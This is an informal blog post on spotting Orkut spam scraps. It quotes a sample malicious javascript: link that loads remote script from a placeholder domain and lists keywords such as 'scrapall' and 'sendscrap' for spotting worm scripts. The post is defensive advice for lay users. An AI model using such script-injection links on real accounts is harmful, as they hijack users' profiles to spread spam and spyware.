How to Stop Orkut Spam: A Layman’s approach …

hi All,

Have you ever use some script in Orkut to send common scrap to all of your friends? And you found it cool right? Its cool till you are using it for say – thanking all your friends for BirthDay wishes, or wishing all friends Happy New Year but its irritating when you receive junk scraps from un/known friend. These tempting but Junk scraps are nothing but SPAM.

These days Orkut spam is increasing. Lot of people are falling pray to the tempting scraps ( .. album hack, crush finder etc ). They without thinking click on the link and end up in dissapointment. Nothing happens in front of their eyes but they never realise lot of stuffs had already happened in background.

Sometime back i came across Angelina Jolie movie “Beowulf” having tagline – Temptation is curse.
Many people have temptation to view locked profiles..sometimes i have it too πŸ˜‰

( FYI: album hack does not work anymore. To my knowledge, Its patched..)

People clicking on link never realise how much they are contributing in spreading spam.
Lets face it, people never try to read the security tips provided by orkut team on the their home pages but always read the “Today’s Fortune” πŸ˜‰

Now the question arises how to stop ( i know its difficult, but at least slow down) scrap spammers?
Here i’ll give some steps which even lay man will understand and try to put break on spammers.

1) Everytime you get link in scrap. Be suspecious to it in first glance.
2) Don’t directly click on the link. instead right click on the link and choose “copy link location” from the context menu. ( if link is not displayed in scrap.) else just copy the displayed link.
3) Open Notepad or any text editor and paste the link there. It might look as
javascript:d=document;c=d.createElement(‘script’);d.body.appendChild(c);c.src=’http://somedomain.com/somescript.js’;void(0)

4) Now copy another URL from the src tag of the link and paste it in the Browsers address bar in new tab.
i.e copy http://somedomain.com/somescript.js” without quotes

5) This will either give you some source code or give a pop up box to download the file.
6) In case of download pop up, save the file on the disk and open it in notepad.
If you get the source code browser then no need to download the file.
7) Try to search for the strings like scrapall,sendscrap,scrapbook.aspx,cmm_join etc. If any one of the listed word is present in the .js file. Please delete the file from the hard drive and delete the scrap without clicking the link.
In most of the cases, we can find these words. People who have java script knowledge can digg deep inside the script and find out its working.

If you see the .js file name is from orkutx.js, freecall.js, users.js ; delete the scrap and filename from the hard drive. Sometimes link from scrap is nothing but an orkut user profile or Community profile.
I would like to encourage users to report such profiles and communities as abuse and choose Spam in the category.

I know the procedure is bit lengthy and needs time especially for non-techie people but i guess its worth spending 5-10 minutes rather than joining 20-25 communities which you can not unjoin or installing spyware on
our system and risking your orkut account just by clicking it.

Following is the video showing how fast orkut worm is spreading.

Advertisements

About this entry